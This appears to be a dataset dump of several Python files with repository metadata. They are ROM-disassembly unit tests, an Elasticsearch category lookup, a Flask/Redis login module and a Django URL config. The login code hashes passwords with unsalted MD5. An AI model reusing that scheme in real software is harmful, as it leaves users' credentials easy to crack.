self.assertEqual(x(249), "HM_07") self.assertEqual(x(173), "BERRY") self.assertEqual(x(45), None) def test_generate_item_constants(self): x = generate_item_constants r = x() self.failUnless("HM_07" in r) self.failUnless("EQU" in r) def test_get_label_for(self): global all_labels temp = copy(all_labels) # this is basd on the format defined in get_labels_between all_labels = [{"label": "poop", "address": 0x5, "offset": 0x5, "bank": 0, "line_number": 2 }] self.assertEqual(get_label_for(5), "poop") all_labels = temp def test_generate_map_constant_labels(self): ids = generate_map_constant_labels() self.assertEqual(ids[0]["label"], "OLIVINE_POKECENTER_1F") self.assertEqual(ids[1]["label"], "OLIVINE_GYM") def test_get_id_for_map_constant_label(self): global map_internal_ids map_internal_ids = generate_map_constant_labels() self.assertEqual(get_id_for_map_constant_label("OLIVINE_GYM"), 1) self.assertEqual(get_id_for_map_constant_label("OLIVINE_POKECENTER_1F"), 0) def test_get_map_constant_label_by_id(self): global map_internal_ids map_internal_ids = generate_map_constant_labels() self.assertEqual(get_map_constant_label_by_id(0), "OLIVINE_POKECENTER_1F") self.assertEqual(get_map_constant_label_by_id(1), "OLIVINE_GYM") def test_is_valid_address(self): self.assertTrue(is_valid_address(0)) self.assertTrue(is_valid_address(1)) self.assertTrue(is_valid_address(10)) self.assertTrue(is_valid_address(100)) self.assertTrue(is_valid_address(1000)) self.assertTrue(is_valid_address(10000)) self.assertFalse(is_valid_address(2097153)) self.assertFalse(is_valid_address(2098000)) addresses = [random.randrange(0,2097153) for i in range(0, 9+1)] for address in addresses: self.assertTrue(is_valid_address(address)) class TestIntervalMap(unittest.TestCase): def test_intervals(self): i = IntervalMap() first = "hello world" second = "testing 123" i[0:5] = first i[5:10] = second self.assertEqual(i[0], first) self.assertEqual(i[1], first) self.assertNotEqual(i[5], first) self.assertEqual(i[6], second) i[3:10] = second self.assertEqual(i[3], second) self.assertNotEqual(i[4], first) def test_items(self): i = IntervalMap() first = "hello world" second = "testing 123" i[0:5] = first i[5:10] = second results = list(i.items()) self.failUnless(len(results) == 2) self.assertEqual(results[0], ((0, 5), "hello world")) self.assertEqual(results[1], ((5, 10), "testing 123")) class TestRomStr(unittest.TestCase): """RomStr is a class that should act exactly like str() except that it never shows the contents of it string unless explicitly forced""" sample_text = "hello world!" sample = None def setUp(self): if self.sample == None: self.__class__.sample = RomStr(self.sample_text) def test_equals(self): "check if RomStr() == str()" self.assertEquals(self.sample_text, self.sample) def test_not_equal(self): "check if RomStr('a') != RomStr('b')" self.assertNotEqual(RomStr('a'), RomStr('b')) def test_appending(self): "check if RomStr()+'a'==str()+'a'" self.assertEquals(self.sample_text+'a', self.sample+'a') def test_conversion(self): "check if RomStr() -> str() works" self.assertEquals(str(self.sample), self.sample_text) def test_inheritance(self): self.failUnless(issubclass(RomStr, str)) def test_length(self): self.assertEquals(len(self.sample_text), len(self.sample)) self.assertEquals(len(self.sample_text), self.sample.length()) self.assertEquals(len(self.sample), self.sample.length()) def test_rom_interval(self): global rom load_rom() address = 0x100 interval = 10 correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce', '0xed', '0x66', '0x66', '0xcc', '0xd'] byte_strings = rom.interval(address, interval, strings=True) self.assertEqual(byte_strings, correct_strings) correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13] ints = rom.interval(address, interval, strings=False) self.assertEqual(ints, correct_ints) def test_rom_until(self): global rom load_rom() address = 0x1337 byte = 0x13 bytes = rom.until(address, byte, strings=True) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == '0xd5') bytes = rom.until(address, byte, strings=False) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == 0xd5) class TestAsmList(unittest.TestCase): """AsmList is a class that should act exactly like list() except that it never shows the contents of its list unless explicitly forced""" def test_equals(self): base = [1,2,3] asm = AsmList(base) self.assertEquals(base, asm) self.assertEquals(asm, base) self.assertEquals(base, list(asm)) def test_inheritance(self): self.failUnless(issubclass(AsmList, list)) def test_length(self): base = range(0, 10) asm = AsmList(base) self.assertEquals(len(base), len(asm)) self.assertEquals(len(base), asm.length()) self.assertEquals(len(base), len(list(asm))) self.assertEquals(len(asm), asm.length()) def test_remove_quoted_text(self): x = remove_quoted_text self.assertEqual(x("hello world"), "hello world") self.assertEqual(x("hello \"world\""), "hello ") input = 'hello world "testing 123"' self.assertNotEqual(x(input), input) input = "hello world 'testing 123'" self.assertNotEqual(x(input), input) self.failIf("testing" in x(input)) def test_line_has_comment_address(self): x = line_has_comment_address self.assertFalse(x("")) self.assertFalse(x(";")) self.assertFalse(x(";;;")) self.assertFalse(x(":;")) self.assertFalse(x(":;:")) self.assertFalse(x(";:")) self.assertFalse(x(" ")) self.assertFalse(x("".join(" " * 5))) self.assertFalse(x("".join(" " * 10))) self.assertFalse(x("hello world")) self.assertFalse(x("hello_world")) self.assertFalse(x("hello_world:")) self.assertFalse(x("hello_world:;")) self.assertFalse(x("hello_world: ;")) self.assertFalse(x("hello_world: ; ")) self.assertFalse(x("hello_world: ;" + "".join(" " * 5))) self.assertFalse(x("hello_world: ;" + "".join(" " * 10))) self.assertTrue(x(";1")) self.assertTrue(x(";F")) self.assertTrue(x(";$00FF")) self.assertTrue(x(";0x00FF")) self.assertTrue(x("; 0x00FF")) self.assertTrue(x(";$3:$300")) self.assertTrue(x(";0x3:$300")) self.assertTrue(x(";$3:0x300")) self.assertTrue(x(";3:300")) self.assertTrue(x(";3:FFAA")) self.assertFalse(x('hello world "how are you today;0x1"')) self.assertTrue(x('hello world "how are you today:0x1";1')) returnable = {} self.assertTrue(x("hello_world: ; 0x4050", returnable=returnable, bank=5)) self.assertTrue(returnable["address"] == 0x14050) def test_line_has_label(self): x = line_has_label self.assertTrue(x("hi:")) self.assertTrue(x("Hello: ")) self.assertTrue(x("MyLabel: ; test xyz")) self.assertFalse(x(":")) self.assertFalse(x(";HelloWorld:")) self.assertFalse(x("::::")) self.assertFalse(x(":;:;:;:::")) def test_get_label_from_line(self): x = get_label_from_line self.assertEqual(x("HelloWorld: "), "HelloWorld") self.assertEqual(x("HiWorld:"), "HiWorld") self.assertEqual(x("HiWorld"), None) def test_find_labels_without_addresses(self): global asm asm = ["hello_world: ; 0x1", "hello_world2: ;"] labels = find_labels_without_addresses() self.failUnless(labels[0]["label"] == "hello_world2") asm = ["hello world: ;1", "hello_world: ;2"] labels = find_labels_without_addresses() self.failUnless(len(labels) == 0) asm = None def test_get_labels_between(self): global asm x = get_labels_between#(start_line_id, end_line_id, bank) asm = ["HelloWorld: ;1", "hi:", "no label on this line", ] labels = x(0, 2, 0x12) self.assertEqual(len(labels), 1) self.assertEqual(labels[0]["label"], "HelloWorld") del asm # this test takes a lot of time :( def xtest_scan_for_predefined_labels(self): # label keys: line_number, bank, label, offset, address load_asm() all_labels = scan_for_predefined_labels() label_names = [x["label"] for x in all_labels] self.assertIn("GetFarByte", label_names) self.assertIn("AddNTimes", label_names) self.assertIn("CheckShininess", label_names) def test_write_all_labels(self): """dumping json into a file""" filename = "test_labels.json" # remove the current file if os.path.exists(filename): os.system("rm " + filename) # make up some labels labels = [] # fake label 1 label = {"line_number": 5, "bank": 0, "label": "SomeLabel", "address": 0x10} labels.append(label) # fake label 2 label = {"line_number": 15, "bank": 2, "label": "SomeOtherLabel", "address": 0x9F0A} labels.append(label) # dump to file write_all_labels(labels, filename=filename) # open the file and read the contents file_handler = open(filename, "r") contents = file_handler.read() file_handler.close() # parse into json obj = json.read(contents) # begin testing self.assertEqual(len(obj), len(labels)) self.assertEqual(len(obj), 2) self.assertEqual(obj, labels) def test_isolate_incbins(self): global asm asm = ["123", "456", "789", "abc", "def", "ghi", 'INCBIN "baserom.gbc",$12DA,$12F8 - $12DA', "jkl", 'INCBIN "baserom.gbc",$137A,$13D0 - $137A'] lines = isolate_incbins() self.assertIn(asm[6], lines) self.assertIn(asm[8], lines) for line in lines: self.assertIn("baserom", line) def test_process_incbins(self): global incbin_lines, processed_incbins, asm incbin_lines = ['INCBIN "baserom.gbc",$12DA,$12F8 - $12DA', 'INCBIN "baserom.gbc",$137A,$13D0 - $137A'] asm = copy(incbin_lines) asm.insert(1, "some other random line") processed_incbins = process_incbins() self.assertEqual(len(processed_incbins), len(incbin_lines)) self.assertEqual(processed_incbins[0]["line"], incbin_lines[0]) self.assertEqual(processed_incbins[2]["line"], incbin_lines[1]) def test_reset_incbins(self): global asm, incbin_lines, processed_incbins # temporarily override the functions global load_asm, isolate_incbins, process_incbins temp1, temp2, temp3 = load_asm, isolate_incbins, process_incbins def load_asm(): pass def isolate_incbins(): pass def process_incbins(): pass # call reset reset_incbins() # check the results self.assertTrue(asm == [] or asm == None) self.assertTrue(incbin_lines == []) self.assertTrue(processed_incbins == {}) # reset the original functions load_asm, isolate_incbins, process_incbins = temp1, temp2, temp3 def test_find_incbin_to_replace_for(self): global asm, incbin_lines, processed_incbins asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line'] isolate_incbins() process_incbins() line_num = find_incbin_to_replace_for(0x100) # must be the 4th line (the INBIN line) self.assertEqual(line_num, 3) def test_split_incbin_line_into_three(self): global asm, incbin_lines, processed_incbins asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line'] isolate_incbins() process_incbins() content = split_incbin_line_into_three(3, 0x100, 10) # must end up with three INCBINs in output self.failUnless(content.count("INCBIN") == 3) def test_analyze_intervals(self): global asm, incbin_lines, processed_incbins asm, incbin_lines, processed_incbins = None, [], {} asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line', 'INCBIN "baserom.gbc",$33F,$4000 - $33F'] isolate_incbins() process_incbins() largest = analyze_intervals() self.assertEqual(largest[0]["line_number"], 6) self.assertEqual(largest[0]["line"], asm[6]) self.assertEqual(largest[1]["line_number"], 3) self.assertEqual(largest[1]["line"], asm[3]) def test_generate_diff_insert(self): global asm asm = ['first line', 'second line', 'third line', 'INCBIN "baserom.gbc",$90,$200 - $90', 'fifth line', 'last line', 'INCBIN "baserom.gbc",$33F,$4000 - $33F'] diff = generate_diff_insert(0, "the real first line", debug=False) self.assertIn("the real first line", diff) self.assertIn("INCBIN", diff) self.assertNotIn("No newline at end of file", diff) self.assertIn("+"+asm[1], diff) class TestMapParsing(unittest.TestCase): def test_parse_all_map_headers(self): global parse_map_header_at, old_parse_map_header_at, counter counter = 0 for k in map_names.keys(): if "offset" not in map_names[k].keys(): map_names[k]["offset"] = 0 temp = parse_map_header_at temp2 = old_parse_map_header_at def parse_map_header_at(address, map_group=None, map_id=None, debug=False): global counter counter += 1 return {} old_parse_map_header_at = parse_map_header_at parse_all_map_headers(debug=False) # parse_all_map_headers is currently doing it 2x # because of the new/old map header parsing routines self.assertEqual(counter, 388 * 2) parse_map_header_at = temp old_parse_map_header_at = temp2 class TestTextScript(unittest.TestCase): """for testing 'in-script' commands, etc.""" #def test_to_asm(self): # pass # or raise NotImplementedError, bryan_message #def test_find_addresses(self): # pass # or raise NotImplementedError, bryan_message #def test_parse_text_at(self): # pass # or raise NotImplementedError, bryan_message class TestEncodedText(unittest.TestCase): """for testing chars-table encoded text chunks""" def test_process_00_subcommands(self): g = process_00_subcommands(0x197186, 0x197186+601, debug=False) self.assertEqual(len(g), 42) self.assertEqual(len(g[0]), 13) self.assertEqual(g[1], [184, 174, 180, 211, 164, 127, 20, 231, 81]) def test_parse_text_at2(self): oakspeech = parse_text_at2(0x197186, 601, debug=False) self.assertIn("encyclopedia", oakspeech) self.assertIn("researcher", oakspeech) self.assertIn("dependable", oakspeech) def test_parse_text_engine_script_at(self): p = parse_text_engine_script_at(0x197185, debug=False) self.assertEqual(len(p.commands), 2) self.assertEqual(len(p.commands[0]["lines"]), 41) # don't really care about these other two def test_parse_text_from_bytes(self): pass def test_parse_text_at(self): pass class TestScript(unittest.TestCase): """for testing parse_script_engine_script_at and script parsing in general. Script should be a class.""" #def test_parse_script_engine_script_at(self): # pass # or raise NotImplementedError, bryan_message def test_find_all_text_pointers_in_script_engine_script(self): address = 0x197637 # 0x197634 script = parse_script_engine_script_at(address, debug=False) bank = calculate_bank(address) r = find_all_text_pointers_in_script_engine_script(script, bank=bank, debug=False) results = list(r) self.assertIn(0x197661, results) class TestLabel(unittest.TestCase): def test_label_making(self): line_number = 2 address = 0xf0c0 label_name = "poop" l = Label(name=label_name, address=address, line_number=line_number) self.failUnless(hasattr(l, "name")) self.failUnless(hasattr(l, "address")) self.failUnless(hasattr(l, "line_number")) self.failIf(isinstance(l.address, str)) self.failIf(isinstance(l.line_number, str)) self.failUnless(isinstance(l.name, str)) self.assertEqual(l.line_number, line_number) self.assertEqual(l.name, label_name) self.assertEqual(l.address, address) class TestByteParams(unittest.TestCase): @classmethod def setUpClass(cls): load_rom() cls.address = 10 cls.sbp = SingleByteParam(address=cls.address) @classmethod def tearDownClass(cls): del cls.sbp def test__init__(self): self.assertEqual(self.sbp.size, 1) self.assertEqual(self.sbp.address, self.address) def test_parse(self): self.sbp.parse() self.assertEqual(str(self.sbp.byte), str(45)) def test_to_asm(self): self.assertEqual(self.sbp.to_asm(), "$2d") self.sbp.should_be_decimal = True self.assertEqual(self.sbp.to_asm(), str(45)) # HexByte and DollarSignByte are the same now def test_HexByte_to_asm(self): h = HexByte(address=10) a = h.to_asm() self.assertEqual(a, "$2d") def test_DollarSignByte_to_asm(self): d = DollarSignByte(address=10) a = d.to_asm() self.assertEqual(a, "$2d") def test_ItemLabelByte_to_asm(self): i = ItemLabelByte(address=433) self.assertEqual(i.byte, 54) self.assertEqual(i.to_asm(), "COIN_CASE") self.assertEqual(ItemLabelByte(address=10).to_asm(), "$2d") def test_DecimalParam_to_asm(self): d = DecimalParam(address=10) x = d.to_asm() self.assertEqual(x, str(0x2d)) class TestMultiByteParam(unittest.TestCase): def setup_for(self, somecls, byte_size=2, address=443, **kwargs): self.cls = somecls(address=address, size=byte_size, **kwargs) self.assertEqual(self.cls.address, address) self.assertEqual(self.cls.bytes, rom_interval(address, byte_size, strings=False)) self.assertEqual(self.cls.size, byte_size) def test_two_byte_param(self): self.setup_for(MultiByteParam, byte_size=2) self.assertEqual(self.cls.to_asm(), "$f0c0") def test_three_byte_param(self): self.setup_for(MultiByteParam, byte_size=3) def test_PointerLabelParam_no_bank(self): self.setup_for(PointerLabelParam, bank=None) # assuming no label at this location.. self.assertEqual(self.cls.to_asm(), "$f0c0") global all_labels # hm.. maybe all_labels should be using a class? all_labels = [{"label": "poop", "address": 0xf0c0, "offset": 0xf0c0, "bank": 0, "line_number": 2 }] self.assertEqual(self.cls.to_asm(), "poop") class TestPostParsing: #(unittest.TestCase): """tests that must be run after parsing all maps""" @classmethod def setUpClass(cls): run_main() def test_signpost_counts(self): self.assertEqual(len(map_names[1][1]["signposts"]), 0) self.assertEqual(len(map_names[1][2]["signposts"]), 2) self.assertEqual(len(map_names[10][5]["signposts"]), 7) def test_warp_counts(self): self.assertEqual(map_names[10][5]["warp_count"], 9) self.assertEqual(map_names[18][5]["warp_count"], 3) self.assertEqual(map_names[15][1]["warp_count"], 2) def test_map_sizes(self): self.assertEqual(map_names[15][1]["height"], 18) self.assertEqual(map_names[15][1]["width"], 10) self.assertEqual(map_names[7][1]["height"], 4) self.assertEqual(map_names[7][1]["width"], 4) def test_map_connection_counts(self): self.assertEqual(map_names[7][1]["connections"], 0) self.assertEqual(map_names[10][1]["connections"], 12) self.assertEqual(map_names[10][2]["connections"], 12) self.assertEqual(map_names[11][1]["connections"], 9) # or 13? def test_second_map_header_address(self): self.assertEqual(map_names[11][1]["second_map_header_address"], 0x9509c) self.assertEqual(map_names[1][5]["second_map_header_address"], 0x95bd0) def test_event_address(self): self.assertEqual(map_names[17][5]["event_address"], 0x194d67) self.assertEqual(map_names[23][3]["event_address"], 0x1a9ec9) def test_people_event_counts(self): self.assertEqual(len(map_names[23][3]["people_events"]), 4) self.assertEqual(len(map_names[10][3]["people_events"]), 9) class TestMetaTesting(unittest.TestCase): """test whether or not i am finding at least some of the tests in this file""" tests = None def setUp(self): if self.tests == None: self.__class__.tests = assemble_test_cases() def test_assemble_test_cases_count(self): "does assemble_test_cases find some tests?" self.failUnless(len(self.tests) > 0) def test_assemble_test_cases_inclusion(self): "is this class found by assemble_test_cases?" # i guess it would have to be for this to be running? self.failUnless(self.__class__ in self.tests) def test_assemble_test_cases_others(self): "test other inclusions for assemble_test_cases" self.failUnless(TestRomStr in self.tests) self.failUnless(TestCram in self.tests) def test_check_has_test(self): self.failUnless(check_has_test("beaver", ["test_beaver"])) self.failUnless(check_has_test("beaver", ["test_beaver_2"])) self.failIf(check_has_test("beaver_1", ["test_beaver"])) def test_find_untested_methods(self): untested = find_untested_methods() # the return type must be an iterable self.failUnless(hasattr(untested, "__iter__")) #.. basically, a list self.failUnless(isinstance(untested, list)) def test_find_untested_methods_method(self): """create a function and see if it is found""" # setup a function in the global namespace global some_random_test_method # define the method def some_random_test_method(): pass # first make sure it is in the global scope members = inspect.getmembers(sys.modules[__name__], inspect.isfunction) func_names = [functuple[0] for functuple in members] self.assertIn("some_random_test_method", func_names) # test whether or not it is found by find_untested_methods untested = find_untested_methods() self.assertIn("some_random_test_method", untested) # remove the test method from the global namespace del some_random_test_method def test_load_tests(self): loader = unittest.TestLoader() suite = load_tests(loader, None, None) suite._tests[0]._testMethodName membership_test = lambda member: \ inspect.isclass(member) and issubclass(member, unittest.TestCase) tests = inspect.getmembers(sys.modules[__name__], membership_test) classes = [x[1] for x in tests] for test in suite._tests: self.assertIn(test.__class__, classes) def test_report_untested(self): untested = find_untested_methods() output = report_untested() if len(untested) > 0: self.assertIn("NOT TESTED", output) for name in untested: self.assertIn(name, output) elif len(untested) == 0: self.assertNotIn("NOT TESTED", output) def assemble_test_cases(): """finds classes that inherit from unittest.TestCase because i am too lazy to remember to add them to a global list of tests for the suite runner""" classes = [] clsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass) for (name, some_class) in clsmembers: if issubclass(some_class, unittest.TestCase): classes.append(some_class) return classes def load_tests(loader, tests, pattern): suite = unittest.TestSuite() for test_class in assemble_test_cases(): tests = loader.loadTestsFromTestCase(test_class) suite.addTests(tests) return suite def check_has_test(func_name, tested_names): """checks if there is a test dedicated to this function""" if "test_"+func_name in tested_names: return True for name in tested_names: if "test_"+func_name in name: return True return False def find_untested_methods(): """finds all untested functions in this module by searching for method names in test case method names.""" untested = [] avoid_funcs = ["main", "run_tests", "run_main", "copy", "deepcopy"] test_funcs = [] # get a list of all classes in this module classes = inspect.getmembers(sys.modules[__name__], inspect.isclass) # for each class.. for (name, klass) in classes: # only look at those that have tests if issubclass(klass, unittest.TestCase): # look at this class' methods funcs = inspect.getmembers(klass, inspect.ismethod) # for each method.. for (name2, func) in funcs: # store the ones that begin with test_ if "test_" in name2 and name2[0:5] == "test_": test_funcs.append([name2, func]) # assemble a list of all test method names (test_x, test_y, ..) tested_names = [funcz[0] for funcz in test_funcs] # now get a list of all functions in this module funcs = inspect.getmembers(sys.modules[__name__], inspect.isfunction) # for each function.. for (name, func) in funcs: # we don't care about some of these if name in avoid_funcs: continue # skip functions beginning with _ if name[0] == "_": continue # check if this function has a test named after it has_test = check_has_test(name, tested_names) if not has_test: untested.append(name) return untested def report_untested(): """ This reports about untested functions in the global namespace. This was originally in the crystal module, where it would list out the majority of the functions. Maybe it should be moved back. """ untested = find_untested_methods() output = "NOT TESTED: [" first = True for name in untested: if first: output += name first = False else: output += ", "+name output += "]\n" output += "total untested: " + str(len(untested)) return output def run_tests(): # rather than unittest.main() loader = unittest.TestLoader() suite = load_tests(loader, None, None) unittest.TextTestRunner(verbosity=2).run(suite) print report_untested() # run the unit tests when this file is executed directly if __name__ == "__main__": run_tests()
UTF-8
Python
false
false
37,500
py
147
tests.py
8
0.613095
0.585065
0
1,014
35.976331
95
naveenpras/listapi
16,363,825,397,813
5e6b9fcacf6e5eb10a881358691f786ecefa8c95
a8b3877bec390809d446e66ce130e1907b3998f5
/apiservice/utils.py
a6c22e1532d2ca3a045cae1da97ad7990276d53e
[]
no_license
https://github.com/naveenpras/listapi
d42dbcfb459bbabe7e23e2dfd1ea8c9b76c9f31e
d4c439468e7c3329baf6879040a9fb34824bc7f3
refs/heads/master
"2015-08-11T23:55:16.517000"
"2015-06-24T05:56:09"
"2015-06-24T05:56:09"
20,580,908
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from elasticutils import S import logging logger = logging.getLogger(__name__) class Utils(): def searchItemAndGetCategory(self,item): logger.debug("Finding Category for:" + item) #searchstring = item.lower() searchstring = item logger.debug("Getting category using match for:" + searchstring) categoryid = "0" q = S().query(item__match=searchstring) if q.count() > 0: result = list(q[:1])[0] categoryid = result.CategoryId logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId)) return int(categoryid) else: logger.debug("Getting category using fuzzy for:" + searchstring) q = S().query(item__fuzzy=searchstring) if q.count() > 0: result = list(q[:1])[0] categoryid = result.CategoryId logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId)) return int(categoryid) else: logger.debug("Getting category using wildcard for:" + searchstring) q = S().query(item__wildcard="*" + searchstring + "*") if q.count() > 0: result = list(q[:1])[0] categoryid = result.CategoryId logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId)) return int(categoryid) else: logger.info("\tCategory not found for item:" + item) return int(categoryid)
UTF-8
Python
false
false
1,608
py
28
utils.py
17
0.536692
0.530473
0
37
42.486486
97
ssurkovs/planerka
15,479,062,143,907
f48b644b8025c6ab106dcc3c6eea0c3158924d77
56429de82e9539f6165d3ead31b0762e7bd7dd12
/views/login.py
681c7c2f21714af0cf26a679b8fea36a16c6429f
[]
no_license
https://github.com/ssurkovs/planerka
9f2ce82ac3e772764b2bd6b600d83930db516a78
8d9abe46b62ba96687e0dddcd9b517504d210970
refs/heads/master
"2018-10-28T20:09:29.117000"
"2018-10-25T16:08:05"
"2018-10-25T16:08:05"
112,482,528
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- from hashlib import md5 from flask import request, session from flask_login import LoginManager, login_user, logout_user, current_user import pickle from datetime import timedelta from uuid import uuid4 from redis import Redis from werkzeug.datastructures import CallbackDict from flask.sessions import SessionInterface, SessionMixin from . import app from models.User import User from utils.utils import gen_reply login_manager = LoginManager() login_manager.init_app(app) login_manager.login_view = 'login' class RedisSession(CallbackDict, SessionMixin): def __init__(self, initial=None, sid=None, new=False): def on_update(self): self.modified = True CallbackDict.__init__(self, initial, on_update) self.sid = sid self.new = new self.modified = False class RedisSessionInterface(SessionInterface): serializer = pickle session_class = RedisSession def __init__(self, redis=None, prefix='session:'): if redis is None: redis = Redis() self.redis = redis self.prefix = prefix def generate_sid(self): return str(uuid4()) def get_redis_expiration_time(self, app, session): if session.permanent: return app.permanent_session_lifetime return timedelta(days=1) def open_session(self, app, request): sid = request.cookies.get(app.session_cookie_name) if not sid: sid = self.generate_sid() return self.session_class(sid=sid, new=True) val = self.redis.get(self.prefix + sid) if val is not None: data = self.serializer.loads(val) return self.session_class(data, sid=sid) return self.session_class(sid=sid, new=True) def save_session(self, app, session, response): domain = self.get_cookie_domain(app) if not session: self.redis.delete(self.prefix + session.sid) if session.modified: response.delete_cookie(app.session_cookie_name, domain=domain) return redis_exp = self.get_redis_expiration_time(app, session) cookie_exp = self.get_expiration_time(app, session) val = self.serializer.dumps(dict(session)) self.redis.setex(self.prefix + session.sid, val, int(redis_exp.total_seconds())) response.set_cookie(app.session_cookie_name, session.sid, expires=cookie_exp, httponly=True, domain=domain) @login_manager.user_loader def load_user(id_): return app.db.query(User).get(id_) @app.route('/api/v1.0/login', methods=['POST']) def login(): try: params = request.json username = params['login'] password = params['password'] except Exception as e: error = 'Не удалось разобрать параметры запроса: {error}'.format(error=e) app.logger.error(error) return gen_reply(code=400, info=error) password = md5(password.encode()).hexdigest() registered_user = \ app.db.query(User).filter_by(username=str(username), password=str(password), enabled=True).first() if registered_user is None: app.logger.error('Имя пользователя или пароль указаны не верно (login: {}).'.format(username)) return gen_reply(code=400, info='Не правильно указаны логин/пароль.') login_user(registered_user, remember=False) current_user.is_authenticated = True session['config'] = registered_user.get_config() session['user_id'] = registered_user.id session['login'] = registered_user.username session['email'] = registered_user.email session['full_name'] = registered_user.description user_session = { 'user_id': session['user_id'], 'login': session['login'], 'email': session['email'], 'config': session['config'], 'full_name': session['full_name'] } return gen_reply(data=user_session, info='Successful authentication.') @app.route('/api/v1.0/logout', methods=['GET']) def logout(): logout_user() return gen_reply(code=200, info='User logged out.')
UTF-8
Python
false
false
4,386
py
45
login.py
27
0.624271
0.619837
0
133
31.218045
102
OPSRv/backend-mangust
4,801,773,443,131
ace675d8cf9fc162ba3bf2f0379d84a623f0f7cc
1bfdd8eb9857468ad44a522c5b81409f6e4e14e9
/advertising/urls.py
792a3f69bf35b478ec46bad4e5f7d208ac3dda44
[]
no_license
https://github.com/OPSRv/backend-mangust
75238af8e807b253971b1bee3f87d533fc7cbef3
7b40518be0b0c0bbed1da148f7ced18fe05e7be7
refs/heads/main
"2023-08-14T00:28:49.449000"
"2021-10-14T01:18:34"
"2021-10-14T01:18:34"
415,135,478
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.urls import path from rest_framework.urlpatterns import format_suffix_patterns from . import views urlpatterns = [ path('api/advertising/', views.AdvertisingList.as_view()), ] urlpatterns = format_suffix_patterns(urlpatterns)
UTF-8
Python
false
false
244
py
33
urls.py
33
0.778689
0.778689
0
9
26.111111
62

No dataset card yet

New: Create and edit this dataset card directly on the website!

Contribute a Dataset Card
Downloads last month
0
Add dataset card